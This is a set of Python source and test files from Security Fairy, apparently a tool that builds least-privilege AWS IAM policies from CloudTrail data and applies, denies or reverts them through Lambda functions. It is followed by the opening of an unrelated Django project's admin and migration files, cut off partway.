associate_preexisting_policies(aws_entity)
disassociate_security_fairy_policy(aws_entity)
# delete_security_fairy_dynamodb_entry(aws_entity)
def get_preexisting_policies(entity_arn):
dynamodb_client = SESSION.client('dynamodb')
# reach out to security_fairy_dynamodb_table and get 'existing_policies' field
response_item = dynamodb_client.scan(
TableName='security_fairy_dynamodb_table',
# IndexName='entity_arn',
# AttributesToGet=
# [
# 'execution_id',
# 'entity_arn',
# 'existing_policies'
# ],
ScanFilter={
'entity_arn': {
'AttributeValueList': [
{
'S': entity_arn
}
],
'ComparisonOperator': 'EQ'
}
}
)['Items'][0]
logger.info(response_item)
existing_policies = response_item['existing_policies']['SS']
logger.info(existing_policies)
return existing_policies
def associate_preexisting_policies(aws_entity):
iam_client = SESSION.client('iam')
entity_arn = aws_entity.get_full_arn()
existing_policies = get_preexisting_policies(entity_arn)
role_name = aws_entity.get_entity_name()
# for each item in 'existing_policies' attach policy to 'role_arn'
for policy in existing_policies:
logger.info(policy)
attachment_response = iam_client.attach_role_policy(RoleName=role_name,
PolicyArn=policy)
def disassociate_security_fairy_policy(aws_entity):
iam_client = SESSION.client('iam')
account_number = aws_entity.get_account_number()
entity_name = aws_entity.get_entity_name()
policy_arn = 'arn:aws:iam::{account_number}:policy/security-fairy/{entity_name}-security-fairy-revised-policy'\
.format(account_number=account_number,
entity_name=entity_name)\
.replace('_','-')
logger.info(policy_arn)
try:
detach_policy(entity_name, policy_arn)
delete_policy(policy_arn)
except iam_client.exceptions.NoSuchEntityException as error:
logging.info("Error deleting or detaching policy from role: {}, the entity doesn't exist.".format(error))
def detach_policy(entity_name, policy_arn):
iam_client = SESSION.client('iam')
iam_client.detach_role_policy(RoleName=entity_name, PolicyArn=policy_arn)
logging.info("Detaching {} from {}".format(entity_name, policy_arn))
def delete_policy(policy_arn):
iam_client = SESSION.client('iam')
policy_versions = iam_client.list_policy_versions( PolicyArn=policy_arn)['Versions']
for version in policy_versions:
if not version['IsDefaultVersion']:
iam_client.delete_policy_version( PolicyArn=policy_arn,
VersionId=version['VersionId'])
iam_client.delete_policy(PolicyArn=policy_arn)
def nosql_to_list_of_dicts(dynamodb_response_item):
refactored_dicts = []
for item in dynamodb_response_item:
refactored_item = {}
for key in item:
for nested_key in item[key]:
refactored_item[key] = item[key][nested_key]
refactored_dicts.append(refactored_item)
return(refactored_dicts)
if __name__ == '__main__':
# entity_arn = 'arn:aws:iam::281782457076:role/1s_tear_down_role'
# disassociate_security_fairy_policy(entity_arn)
# delete_policy('arn:aws:iam::281782457076:policy/security-fairy/1s-tear-down-role-security-fairy-revised-policy')
# associate_preexisting_policies("arn:aws:iam::281782457076:role/1s_tear_down_role")
# get_all_iam_audited_entities()
# print(nosql_to_list_of_dicts(get_all_iam_audited_entities()))
event = {
"resource":"/revert",
"path":"/revert",
"httpMethod":"GET",
"headers":None,
"queryStringParameters":None,
"pathParameters":None,
"stageVariables":None,
"cognitoAuthenticationType":None,
u'headers': {
u'origin': u'https://twzwjoriak.execute-api.us-east-1.amazonaws.com',
u'Accept': u'text/html',
u'Host': u'twzwjoriak.execute-api.us-east-1.amazonaws.com'
},
u'requestContext': {
u'resourceId': u'ktk3jq',
u'apiId': u'ezwzmmh526',
u'resourcePath': u'/{approval}',
u'httpMethod': u'GET',
u'requestId': u'2938ad50-50a7-11e7-bff1-93579d44e732',
u'path': u'/Prod/approve',
u'accountId': u'281782457076',
u'stage': u'Prod'
}
}
# lambda_handler(event, {})
# dynamodb_response_item = [{u'entity_arn': {u'S': u'arn:aws:iam::281782457076:role/1s_tear_down_role'}, u'existing_policies': {u'SS': [u'arn:aws:iam::281782457076:policy/1S-NetworkAdmin-Policy', u'arn:aws:iam::281782457076:policy/AccessNavigationNotebookObjects', u'arn:aws:iam::281782457076:policy/AllowAuroraToGdeltBucket', u'arn:aws:iam::281782457076:policy/AllowUserChangePassword', u'arn:aws:iam::aws:policy/AdministratorAccess']}, u'execution_id': {u'S': u'4c0201ab-76e3-4c42-80ed-fdd99f5968cf'}}]
# print(type(dynamodb_response_item))
logger.info(get_response(event)['body'].strip('\n'))
--- FILE SEPARATOR ---
"""Revised Policy Approve
Implements the changes suggested by Security
Fairy. Detaches the existing policy for the
queried role and attaches the revised policy.
"""
import boto3
import os
import logging
import re
from setup_logger import create_logger
from aws_entity import AWSEntity
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(profile_name='training', region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
logger = create_logger(name='revised_policy_approve.py', logging_level=logging.INFO)
def lambda_handler(event, context):
""" Executed by the Lambda service.
Detaches the existing managed policies from the
queried role and attaches the Security Fairy
revised policy.
"""
try:
execution_id = event['execution_id']
logger.debug(execution_id)
dynamodb_table = event.get('dynamodb_table', os.environ['dynamodb_table'])
logger.debug(dynamodb_table)
policy_object = get_revised_policy(execution_id, dynamodb_table)
logger.debug(policy_object)
entity_name = AWSEntity(policy_object['entity_arn']).get_entity_name()
logger.debug(entity_name)
existing_policies = get_existing_managed_policies(entity_name)
preserve_existing_policies(execution_id, existing_policies, dynamodb_table)
apply_revised_policy(policy_object)
detach_existing_policies(entity_name, existing_policies)
except Exception as error:
logger.info("There was an error: ")
logger.info(error)
def apply_revised_policy(policy_object):
"""Attach Security Fairy's suggested policy"""
iam_client = SESSION.client('iam')
entity_arn = AWSEntity(policy_object['entity_arn'])
policy = policy_object['policy']
entity_name = entity_arn.get_entity_name()
account_number = entity_arn.get_account_number()
policy_name = "{entity_name}-security-fairy-revised-policy"\
.format(entity_name=entity_name) \
.replace("_","-")
logger.info("Attaching: ")
logger.info(policy_name)
try:
new_policy_arn = create_new_policy(policy_name, policy)
except Exception as e:
logger.info(e)
new_policy_arn = create_new_policy_version(policy_name, policy, account_number)
logger.debug(new_policy_arn)
attachment_response = iam_client.attach_role_policy(RoleName=entity_name,
PolicyArn=new_policy_arn)
logger.debug(attachment_response)
def create_new_policy(policy_name, policy):
iam_client = SESSION.client('iam')
creation_response = iam_client.create_policy( PolicyName=policy_name,
Path='/security-fairy/',
PolicyDocument=policy,
Description='This is an autogenerated policy from Security Fairy')
logger.debug(creation_response)
created_policy_arn = creation_response['Policy']['Arn']
return created_policy_arn
def create_new_policy_version(policy_name, policy, account_number):
policy_arn = "arn:aws:iam::{account_number}:policy/security-fairy/{policy_name}" \
.format(account_number=account_number, policy_name=policy_name)
iam_client = SESSION.client('iam')
versions = iam_client.list_policy_versions( PolicyArn=policy_arn)['Versions']
logger.debug(versions)
if len(versions) > 1:
version_id = versions[1]['VersionId']
logger.debug(version_id)
iam_client.delete_policy_version( PolicyArn=policy_arn,
VersionId=version_id)
# apply new version
response = iam_client.create_policy_version(PolicyArn=policy_arn,
PolicyDocument=policy,
SetAsDefault=True)
logger.info("Policy version {} created.".format(response['PolicyVersion']['VersionId']))
return policy_arn
def get_existing_managed_policies(entity_name):
attached_policies = SESSION.client('iam').list_attached_role_policies(RoleName=entity_name)['AttachedPolicies']
existing_policies = []
for policy in attached_policies:
logger.debug(policy['PolicyArn'])
existing_policies.append(policy['PolicyArn'])
logger.debug(existing_policies)
return existing_policies
def preserve_existing_policies(execution_id, existing_policies, dynamodb_table):
logger.debug(execution_id)
logger.debug(existing_policies)
logger.debug(dynamodb_table)
dynamodb_client = SESSION.client('dynamodb')
if not existing_policies:
logger.info("There were no existing policies attached to this role.")
return
dynamodb_client.update_item(TableName=dynamodb_table,
Key={ "execution_id": { "S": execution_id }},
AttributeUpdates={
"existing_policies": {
"Value":{"SS": existing_policies}
}})
def detach_existing_policies(entity_name, existing_policies):
"""Take existing managed IAM policies and remove them from the role"""
logger.info("Detaching Policies: ")
logger.info(existing_policies)
for policy in existing_policies:
logger.debug(policy)
SESSION.client('iam').detach_role_policy( RoleName=entity_name,
PolicyArn=policy)
def get_revised_policy(execution_id, dynamodb_table):
"""Retrieve Security Fairy's suggested policy"""
return_response = {}
try:
dynamodb_response = SESSION.client('dynamodb')\
.get_item( TableName=dynamodb_table,
Key={
"execution_id": {
"S": execution_id
}
})
return_response['policy'] = dynamodb_response['Item']['new_policy']['S']
return_response['entity_arn'] = dynamodb_response['Item']['entity_arn']['S']
logger.debug(return_response)
return return_response
except Exception as e:
logger.info(e)
raise ValueError('Execution Id doesn\'t exist or has expired. \
Security-fairy must be rerun.')
if __name__ == '__main__':
# existing_policies = ['arn:aws:iam::aws:policy/AmazonS3FullAccess', 'arn:aws:iam::281782457076:policy/security-fairy/1s-security-fairy-role-security-fairy-revised-policy', 'arn:aws:iam::aws:policy/AmazonDynamoDBFullAccess', 'arn:aws:iam::aws:policy/AdministratorAccess']
# dynamodb_table = 'security_fairy_dynamodb_table'
# execution_id = '830eb4f7-364f-44b2-8617-578276ce2270'
# preserve_existing_policies(execution_id, existing_policies, dynamodb_table)
lambda_handler({
"execution_id": "869f474a-d594-42be-869c-3362c063f940",
"dynamodb_table": "security_fairy_dynamodb_table"
}
, {})
# existing_policies = ['arn:aws:iam::aws:policy/AmazonS3FullAccess', 'arn:aws:iam::aws:policy/AmazonDynamoDBFullAccess', 'arn:aws:iam::aws:policy/AdministratorAccess']
# dynamodb_table = 'security_fairy_dynamodb_table'
# execution_id = '4bb5d1ad-17ed-43d7-a06b-59ead4a9cf00'
# preserve_existing_policies(execution_id, existing_policies, dynamodb_table)
# print(get_existing_managed_policies('1s_security_fairy_role'))
--- FILE SEPARATOR ---
"""Revised Policy Deny
Discards the changes suggested by
Security Fairy.
"""
import boto3
import json
import logging
import os
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(profile_name='training')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
""" Executed by the Lambda service.
Deletes Security Fairy's suggested
policy from the DynamoDB table.
"""
logging.debug(event)
event = json.loads(event['Cause'])
logging.debug(event)
execution_id = event['execution_id']
dynamodb_table = os.environ['dynamodb_table']
delete_revised_policy(dynamodb_table, execution_id)
def delete_revised_policy(dynamodb_table, execution_id):
"""Delete Security Fairy's suggested policy"""
SESSION.client('dynamodb')\
.delete_item(TableName=dynamodb_table,
Key={
"execution_id":{
"S": execution_id
}
}
)
if __name__ == '__main__':
lambda_handler({}, {})
--- FILE SEPARATOR ---
"""Revised Policy Generator
Builds a revised policy for the queried
role using data retrieved from Athena.
"""
from __future__ import print_function
import json
import re
import boto3
import logging
from botocore.exceptions import ClientError
from botocore.exceptions import ProfileNotFound
from setup_logger import create_logger
from aws_entity import AWSEntity
from aws_iam_policy import IAMPolicy
logger = create_logger(name="revised_policy_generator.py")
try:
SESSION = boto3.session.Session(profile_name='training', region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
__author__ = 'Justin Iravani'
class NoResults(Exception):
"""No Results Exception Class"""
pass
class QueryFailed(Exception):
"""No Results Exception Class"""
pass
class QueryStillRunning(Exception):
"""No Results Exception Class"""
pass
def lambda_handler(event, context):
""" Executed by the Lambda service.
Returns a revised policy after retrieving
the results of the Security Fairy Athena query.
"""
query_execution_id = event.get('execution_id')
if query_execution_id is None:
raise ValueError("Lambda Function requires 'query_execution_id' to execute.")
try:
raw_query_results = get_query_results(query_execution_id)
aws_entity = get_entity_arn(raw_query_results)
event['query_state'] = 'QueryCompletedOrFailed'
except QueryStillRunning as qsr:
event['query_state'] = 'StillRunning'
return event
service_level_actions = get_permissions_from_query_v2(raw_query_results)
new_iam_policy = IAMPolicy()
new_iam_policy.add_actions(service_level_actions)
logger.info(aws_entity.get_entity_name())
existing_entity_policies = get_existing_entity_policies_v2(aws_entity.get_entity_name())
write_policies_to_dynamodb(query_execution_id, new_iam_policy.print_policy(), aws_entity.get_full_arn(), event.get('dynamodb_table','security_fairy_dynamodb_table'))
event['execution_id'] = query_execution_id
return event
def get_query_results(query_execution_id):
"""Retrieve result set from Athena query"""
athena_client = SESSION.client('athena')
result_set = []
query = athena_client.get_query_execution(QueryExecutionId=query_execution_id)
logger.debug(query)
query_state = query['QueryExecution']['Status']['State']
logger.debug(query_state)
if query_state in ['FAILED', 'CANCELLED']:
raise QueryFailed("Query failed to execute")
if query_state in ['QUEUED', 'RUNNING']:
raise QueryStillRunning("Query still running")
try:
results = athena_client.get_query_results(QueryExecutionId=query_execution_id)
logger.debug(results)
for result in results["ResultSet"]["Rows"][1:]:
result_set.append(result["Data"])
logger.debug(result_set)
except ClientError as cle:
logger.debug(cle)
if not result_set:
raise NoResults("Athena ResultSet {result_set}".format(result_set=result_set))
return result_set
def get_permissions_from_query_v2(result_set):
"""
Retrieve permissions from Athena query results
v2
"""
permissions = []
for result in result_set:
service = result[1]['VarCharValue'].split('.')[0]
actions = result[2]['VarCharValue'].strip('[').strip(']').split(', ')
for action in actions:
permissions.append('{service}:{action}'.format(service=service, action=action))
logger.debug('service actions from Athena Query')
logger.debug(permissions)
return permissions
def get_existing_entity_policies_v2(role_name):
"""
Retrieve existing managed policies for the queried role
"""
iam_client = SESSION.client('iam')
logger.debug("role_name: {}".format(role_name))
policies = []
attached_policies = iam_client.list_attached_role_policies(RoleName=role_name)
existing_policies = attached_policies['AttachedPolicies']
for existing_policy in existing_policies:
if 'arn:aws:iam::aws:policy' not in existing_policy['PolicyArn']:
print(existing_policy)
return existing_policies
def write_policies_to_dynamodb(execution_id, policy, entity_arn, dynamodb_table):
"""Write policies to DynamoDB table"""
dynamodb_client = SESSION.client('dynamodb')
dynamodb_item_to_be_written = {}
existing_item = existing_dynamodb_entry(entity_arn, dynamodb_table)
if existing_item:
dynamodb_item_to_be_written = existing_item[0]
existing_execution_id = dynamodb_item_to_be_written['execution_id']['S']
delete_execution(existing_execution_id, dynamodb_table)
dynamodb_item_to_be_written['new_policy'] = { "S": policy }
dynamodb_item_to_be_written['execution_id'] = { "S": execution_id }
else:
dynamodb_item_to_be_written = { "execution_id": { "S": execution_id },
"new_policy" : { "S": policy },
"entity_arn" : { "S": entity_arn }}
logger.debug("Updated dynamodb_item: {}".format(dynamodb_item_to_be_written))
dynamodb_client.put_item(TableName=dynamodb_table,
Item=dynamodb_item_to_be_written)
def existing_dynamodb_entry(entity_arn, dynamodb_table):
dynamodb_client = SESSION.client('dynamodb')
response = dynamodb_client.scan(TableName=dynamodb_table,
# IndexName='entity_arn',
ScanFilter={ 'entity_arn': {'AttributeValueList': [{ 'S': entity_arn }],
'ComparisonOperator': 'EQ'}})
return response.get('Items')
def delete_execution(execution_id, dynamodb_table):
dynamodb_client = SESSION.client('dynamodb')
response = dynamodb_client.delete_item( TableName=dynamodb_table,
Key={ 'execution_id': { 'S': execution_id }})
def get_entity_arn(result_set):
entity_arn = result_set[0][0]['VarCharValue']
logger.debug(entity_arn)
arn = AWSEntity(entity_arn)
arn.convert_assumed_role_to_role()
return arn
if __name__ == '__main__':
existing_execution_id_for_role('arn:aws:iam::281782457076:role/1s_tear_down_role')
# lambda_handler(
# {
# "execution_id": "ed3dda30-b1d0-4191-ab88-ce2718b89485"
# },
# {}
# )
--- FILE SEPARATOR ---
import sys
sys.path.insert(0,'..')
import logging
import pytest
import json
from aws_iam_policy import IAMPolicy
from aws_iam_policy import IAMStatement
from aws_entity import Arn
logging_level = logging.INFO
# statement = IAMStatement('Allow',["pot:atosoup","goat:cheese"],'*', logging_level = logging_level)
# statement.get_statement()
# policy = IAMPolicy(logging_level = logging_level)
# policy.add_statement(statement)
# print(policy.print_policy())
# print(policy.get_policy())
# arn = Arn('arn:aws:iam::281782457076:role/1s_tear_down_role', logging_level = logging.DEBUG)
# # arn = Arn('arn:aws:iam:us-east-1:842337631775:role/service-role/StatesExecutionRole-us-west-2')
# policy = IAMPolicy(logging_level = logging_level)
# policy.add_action('lambda:Invoke')
# policy.add_action('lambda:Potato20160303')
# policy.add_action('ec2:RunInstances')
# policy.add_action('ec2:StartInstances')
# policy.add_action('monitoring:CreateAlarm')
# print(policy.print_policy())
arn = Arn('arn:aws:sts::281782457076:assumed-role/1s_tear_down_role/lanbda-function-name', logging_level = logging.DEBUG)
print(arn.is_role())
print(arn.is_policy())
print(arn.is_assumed_role())
print(arn.get_full_arn())
arn.convert_assumed_role_to_role()
print(arn.get_full_arn())
def test_iam_policy_class():
"""Test Athena Query"""
policy = IAMPolicy(logging_level = logging_level)
policy.add_action('lambda:Invoke')
policy.add_action('ec2:RunInstances')
policy.add_action('ec2:StartInstances')
policy.add_action('monitoring:CreateAlarm')
assert policy.print_policy() == json.dumps({"Version": "2012-10-17", "Statement": [{"Action": ["ec2:RunInstances", "ec2:StartInstances"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltEc2Policy"}, {"Action": ["cloudwatch:CreateAlarm"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltCloudwatchPolicy"}, {"Action": ["lambda:Invoke"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltLambdaPolicy"}]})
# policy.add_action('ec2:RunInstances')
# policy.add_action('ec2:StartInstances')
# policy.add_action('monitoring:CreateAlarm')
# assert policy.print_policy() == json.dumps({"Version": "2012-10-17", "Statement": [{"Action": ["ec2:RunInstances", "ec2:StartInstances"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltEc2Policy"}, {"Action": ["cloudwatch:CreateAlarm"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltCloudwatchPolicy"}, {"Action": ["lambda:Invoke"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltLambdaPolicy"}]})
--- FILE SEPARATOR ---
"""Security Fairy Tests
This module tests each piece of the Security Fairy tool.
Modules that don't have tests written are in the ``Todo`` section.
Todo:
* API approval
+ Dependency injection:
- test_task_token_*()
- test_api_website_*()
* API endpoint
+ Dependency Injection
- test_invoke_state_machine_*()
* Athena Query
* Revised policy approve
* Revised policy deny
* Revised policy generator
* Variable injection
* Data collection
"""
import sys
sys.path.insert(0,'..')
import pytest
import api_approval as sfaa
import api_endpoint as sfae
import athena_query as sfaq
import revised_policy_approve as sfrpa
import revised_policy_generator as sfrpg
class TestApiApprovalClass(object):
"""Test the api_approval module"""
def test_none_get_domain(self):
"""Test event['headers'] = None
Should return the default domain name of testinvocation
"""
assert sfaa.get_domain({'headers': None}) == 'https://testinvocation/approve'
def test_aws_get_domain(self):
"""Test 'amazonaws.com' in event['headers']['Host']
Should return the amazonaws.com domain with the correct requestContext
"""
assert sfaa.get_domain(
{
'headers': {
'Host': 'ezwzmmh526.execute-api.us-east-1.amazonaws.com'
},
'requestContext': {
'stage': 'Prod'
}
}
) == 'https://ezwzmmh526.execute-api.us-east-1.amazonaws.com/Prod/'
def test_get_domain(self):
"""No amazonaws.com in event['headers']['Host']
Should return the correct domain in the headers stanza
"""
assert sfaa.get_domain(
{
'headers': {
'Host': 'ezwzmmh526.execute-api.us-east-1.blah-blah.test'
}
}
) == 'https://ezwzmmh526.execute-api.us-east-1.blah-blah.test/'
def test_token_task_approve(self):
"""Test 'approve' in event[pathParameters]['approval']
Should return json payload with 'body' = 'New policy applied'
"""
assert sfaa.token_task(
{
'pathParameters': {
'approval': 'approve'
},
'body': '{"task_token":"AAAAKgAAAAIAAAAAAAAAAbwck0ZXLox0l5UCsjE3iQN3iBJNAu9ZWh/ElSrNKHdVP90ZxgrPZvFQZMnl+dcD4J9VdwieXvx2s6VBpQ1AsIrJLYM7y9D1bDRvrct34LA4YldibA7gw3dz5YmvScrCiLX8DLPT5BiKkpKtwN5pVXqlC0fZcSQ4Z2ZdSvAN/awy6S678p5QyxsJlqe3pQpbIZfmQ4XjboqpLMIWSMDkYajtBuxMgtfyX879s5QHzCZ9d0B29WI3FV0PS07xMYrqn+2Nu/2l64JvKMMNBknJZiM2c92AQFZMFvOvMCHnxbtLqZjZpWTaW5Z3O0Cv5B91l6T7bZvk6Dp7QZ6fAdYlQw8S/YT0Vz6z/sMPDf3bxPfGJ9b4cjVHbLX0nK4BEvlAW/OEXJGGYG9X2V/gUoRMs/RwEenzvxi5raZPsHlCqOZzmuszC1H4duNQBaRjF2vzOY60wyOoP7/shrdfPvGKh9LMMUi/ir2y9W8hbCb6R1MZERE9yOIUlK+c5NHZf64JnRvNG2tUF4efOjVIbZfLrayDEAgLqeOtlXSy7yOLxSjdmqcVKXmD2AdnLg2yi/HYyyUc3fQPZES6nPOMpuLz27E=","execution_id":"9487c326-23fc-46d6-a2c2-69b6342b5162"}'
}
) == {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json'
},
'body': 'New policy applied.'
}
def test_token_task_deny(self):
"""Test 'deny' in event[pathParameters]['approval']
Should return json payload with 'body' = 'Revised Policy deleted.'
"""
assert sfaa.token_task(
{
'pathParameters': {
'approval': 'deny'
},
'body': '{"task_token":"AAAAKgAAAAIAAAAAAAAAAbwck0ZXLox0l5UCsjE3iQN3iBJNAu9ZWh/ElSrNKHdVP90ZxgrPZvFQZMnl+dcD4J9VdwieXvx2s6VBpQ1AsIrJLYM7y9D1bDRvrct34LA4YldibA7gw3dz5YmvScrCiLX8DLPT5BiKkpKtwN5pVXqlC0fZcSQ4Z2ZdSvAN/awy6S678p5QyxsJlqe3pQpbIZfmQ4XjboqpLMIWSMDkYajtBuxMgtfyX879s5QHzCZ9d0B29WI3FV0PS07xMYrqn+2Nu/2l64JvKMMNBknJZiM2c92AQFZMFvOvMCHnxbtLqZjZpWTaW5Z3O0Cv5B91l6T7bZvk6Dp7QZ6fAdYlQw8S/YT0Vz6z/sMPDf3bxPfGJ9b4cjVHbLX0nK4BEvlAW/OEXJGGYG9X2V/gUoRMs/RwEenzvxi5raZPsHlCqOZzmuszC1H4duNQBaRjF2vzOY60wyOoP7/shrdfPvGKh9LMMUi/ir2y9W8hbCb6R1MZERE9yOIUlK+c5NHZf64JnRvNG2tUF4efOjVIbZfLrayDEAgLqeOtlXSy7yOLxSjdmqcVKXmD2AdnLg2yi/HYyyUc3fQPZES6nPOMpuLz27E=","execution_id":"9487c326-23fc-46d6-a2c2-69b6342b5162"}'
}
) == {
'statusCode': 200,
'headers': {
'Content-Type': 'application/json'
},
'body': 'Revised Policy deleted.'
}
def test_api_website(self):
"""Test api website"""
assert sfaa.api_website({'queryStringParameters': None}) == "something"
class TestApiEndpointClass(object):
"""Class for validating inputs to Security Fairy"""
# def test_invoke_state_machine(self):
# """Test invocation of the state machine"""
# assert Hello
def test_validate_inputs(self):
"""Test num_days < 30 and valid entity_arn
Should return a json object with correct date window and arn
"""
assert sfae.validate_inputs(
{
'body': "{\
\"entity_arn\":\"arn:aws:sts::281782457076:assumed-role/1S-Admins/alex\",\
\"num_days\":20\
}"
}
) == {
'num_days' : -20,
'entity_arn': 'arn:aws:sts::281782457076:assumed-role/1S-Admins/alex'
}
def test_validate_inputs_big_window(self):
"""Test num_days > 30
Should raise an invalid date range error
"""
event = {'body': "{\
\"entity_arn\":\"arn:aws:sts::281782457076:assumed-role/1S-Admins/alex\",\
\"num_days\":31\
}"
}
with pytest.raises(ValueError):
sfae.validate_inputs(event)
def test_validate_inputs_bad_arn(self):
"""Test for invalid ARN in event['body']
Should raise an invalid ARN error
"""
event = {'body':
"{\
\"entity_arn\":\"arn:aws:sts::assumed-role/1S-Admins/alex\",\
\"num_days\":31\
}"
}
with pytest.raises(ValueError):
sfae.validate_inputs(event)
class TestAthenaQueryClass(object):
"""Class for Athena Query tests"""
def test_execute_query(self):
"""Test query execution"""
assert sfaq.execute_query(
"arn:aws:iam::281782457076:assumed-role/1s_tear_down_role",
"-30",
"1s-potato-east"
) == ''
class TestRevisedPolicyApprove(object):
"""Class for Revised Policy Approve tests"""
def test_get_revised_policy(self):
"""Test get revised policy"""
assert sfrpa.get_revised_policy('') == ''
def test_get_entity_name_from_arn(self):
"""Test get entity name from arn"""
arn = 'arn:aws:iam::281782457076:role/1s_security_fairy_role'
assert sfrpa.get_entity_name_from_arn(arn) == 'role'
class TestRevisedPolicyGenerator(object):
"""Class for Revised Policy Generator"""
def test_get_permissions_from_query(self):
"""test get permissions from query function"""
result_set = [{'VarCharValue': 'ServiceA.amazonaws.com'},
{'VarCharValue': '[testActionOne, testActionTwo]'}
]
assert sfrpg.get_permissions_from_query(result_set) == ""
def test_build_policy_from_query_actions(self):
"""test build policy from query actions"""
assert sfrpg.build_policy_from_query_actions('') == ''
--- FILE SEPARATOR ---
"""Security Fairy Lambda Handler Tests
This module tests the Lambda functionality of the Security Fairy tool.
Lambda Handlers that don't have tests written are in the ``Todo`` section.
Todo:
* API Approval
+ Dependency Injection
- test_api_approval_*()
* API Endpoint
* Athena Query
* Email approval request
* Get task token
* Revised policy approve
* Revised policy deny
* Revised policy generator
* Variable injection
* Data collection
"""
import sys
sys.path.insert(0,'..')
import pytest
from api_approval import lambda_handler as api_approval
from api_endpoint import lambda_handler as api_endpoint
from athena_query import lambda_handler as athena_query
from email_approval_request import lambda_handler as email_approval_request
from get_task_token import lambda_handler as get_task_token
from revised_policy_approve import lambda_handler as revised_policy_approve
from revised_policy_deny import lambda_handler as revised_policy_deny
from revised_policy_generator import lambda_handler as revised_policy_generator
from variable_injection import lambda_handler as variable_injection
class TestLambdaHandlers(object):
"""Test the Lambda Handler from each module"""
def test_api_approval_error(self):
"""Test Lambda Handler for api approval"""
assert api_approval(
{
'httpMethod': 'POST',
'headers': {
'Host': 'ezwzmmh526.execute-api.us-east-1.amazonaws.com'
},
'requestContext': {
'stage': 'Prod'},
'pathParameters': {
'approval': 'deny'},
'body': '{"task_token":"AAAAKgAAAAIAAAAAAAAAAbwck0ZXLox0l5UCsjE3iQN3iBJNAu9ZWh/ElSrNKHdVP90ZxgrPZvFQZMnl+dcD4J9VdwieXvx2s6VBpQ1AsIrJLYM7y9D1bDRvrct34LA4YldibA7gw3dz5YmvScrCiLX8DLPT5BiKkpKtwN5pVXqlC0fZcSQ4Z2ZdSvAN/awy6S678p5QyxsJlqe3pQpbIZfmQ4XjboqpLMIWSMDkYajtBuxMgtfyX879s5QHzCZ9d0B29WI3FV0PS07xMYrqn+2Nu/2l64JvKMMNBknJZiM2c92AQFZMFvOvMCHnxbtLqZjZpWTaW5Z3O0Cv5B91l6T7bZvk6Dp7QZ6fAdYlQw8S/YT0Vz6z/sMPDf3bxPfGJ9b4cjVHbLX0nK4BEvlAW/OEXJGGYG9X2V/gUoRMs/RwEenzvxi5raZPsHlCqOZzmuszC1H4duNQBaRjF2vzOY60wyOoP7/shrdfPvGKh9LMMUi/ir2y9W8hbCb6R1MZERE9yOIUlK+c5NHZf64JnRvNG2tUF4efOjVIbZfLrayDEAgLqeOtlXSy7yOLxSjdmqcVKXmD2AdnLg2yi/HYyyUc3fQPZES6nPOMpuLz27E=",\
"execution_id":"9487c326-23fc-46d6-a2c2-69b6342b5162"}'},
'') == {
"statusCode": 200,
"headers": {
"Content-Type":"application/json"},
"body": ""
}
def test_api_endpoint_invoke_error(self):
"""Test Default API response
Should return 'Unsuccessful: state_machine' as the default response
"""
assert api_endpoint(
{
'body': "{\"entity_arn\":\"arn:aws:sts::281782457076:role/1S-Admins\",\
\"num_days\":30}"
},
{}
) == {
'body': "Unsuccessful:\n 'state_machine'",
'headers': {
'Content-Type': 'application/json'
},
'statusCode': 500
}
def test_athena_query(self):
"""Test Athena Query"""
assert athena_query({}, {}) == ""
def test_email_approval_request(self):
"""Test email approval request"""
assert email_approval_request({}, {}) == ""
def test_get_task_token(self):
"""Test get task token"""
assert get_task_token({}, {}) == ""
def test_revised_policy_approve(self):
"""Test revised policy approve"""
assert revised_policy_approve({}, {}) == ""
def test_revised_policy_deny(self):
"""Test revised policy approve"""
assert revised_policy_deny({}, {}) == ""
def test_revised_policy_generator(self):
"""Test revised policy approve"""
with pytest.raises(ValueError):
revised_policy_generator({'execution_id': None}, {})
def test_variable_injection(self):
"""Test variable injection"""
assert variable_injection({}, {}) == ''
--- FILE SEPARATOR ---
"""Variable Injection
Creates the environment variables used
by subsequent Lambda functions in the
Security Fairy Step Functions Task.
"""
import os
import boto3
def lambda_handler(event, context):
""" Executed by Lambda service.
Define and return runtime-specific
environment variables.
"""
name = os.environ['AWS_LAMBDA_FUNCTION_NAME']
region = os.environ['AWS_REGION']
version = os.environ['AWS_LAMBDA_FUNCTION_VERSION']
lambda_client = boto3.client('lambda', region_name=region)
lambda_function = lambda_client.get_function(FunctionName=name, Qualifier=version)
raw_env_vars = lambda_function['Configuration']['Environment']['Variables']
for key, value in raw_env_vars.items():
event[key] = value
return event
|
[
"/api_approval.py",
"/api_endpoint.py",
"/athena_query.py",
"/aws_api_tools.py",
"/aws_iam_policy.py",
"/aws_session_manager.py",
"/build_cloudtrail_table.py",
"/denied_notification.py",
"/email_approval_request.py",
"/get_task_token.py",
"/partition_cloudtrail_bucket.py",
"/revert.py",
"/revised_policy_approve.py",
"/revised_policy_deny.py",
"/revised_policy_generator.py",
"/tests/test_classes.py",
"/tests/test_general.py",
"/tests/test_lambda_handlers.py",
"/variable_injection.py"
] |
01DEEKSHA/Rescue
|
from django.contrib import admin
from .models import contact,SlideShowItem
# Register your models here.
admin.site.register(contact)
# Registered the model
admin.site.register(SlideShowItem)
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2021-03-30 13:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main_app', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Login',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Username_or_Email', models.CharField(max_length=100)),
('password', models.CharField(max_length=32)),
],
),
migrations.CreateModel(
name='SlideShowItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, verbose_name='Name')),
('image', models.ImageField(upload_to='Images/slideshow')),
